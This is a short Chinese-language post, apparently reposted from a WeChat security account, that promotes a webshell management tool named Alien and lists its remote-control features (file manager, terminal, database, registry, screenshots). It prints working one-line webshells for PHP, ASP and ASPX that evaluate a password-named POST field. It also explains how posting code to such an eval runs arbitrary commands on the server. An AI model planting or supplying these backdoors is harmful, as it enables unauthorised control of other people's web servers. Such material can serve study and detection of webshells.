语言
功能
-
File Manager (可显示图片, 可SearchFile) -
虚拟终端 -
数据库 -
注册表 -
监控 -
截图 -
系统信息
一句话木马
强大之处在于木马本身体积小,不易发现
以下是最简单的一句话木马
PHP eval($_POST['password']); @
ASP <%execute(request("password"))%>
ASPX <%@ Page Language="Jscript"%><%eval(Request.Item["password"])%>当然, Alien还可以使用asmx, ashx等等的Webshell。
NodeJS和JSP https://github.com/malbuffer4pt/Alien/blob/main/shell.txt
shell有进行更改, 新增了可以显示图片的功能
NodeJS目的重在管理而非渗透
原理
如果eval()中带有可控变量,那么就可以执行任意代码。
如eval($_POST['a']);
HTTP POST a=phpinfo(); 就可以执行phpinfo();
-
工具Payloads文件夹内有符合恶意程序的Payload, 可能会被防毒删除 -
目前只有删减版,但部份代码没有删除,Disassemble应该会有奇怪但无法使用的东西
原文始发于微信公众号(昊天信安):一款新的webshell管理工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论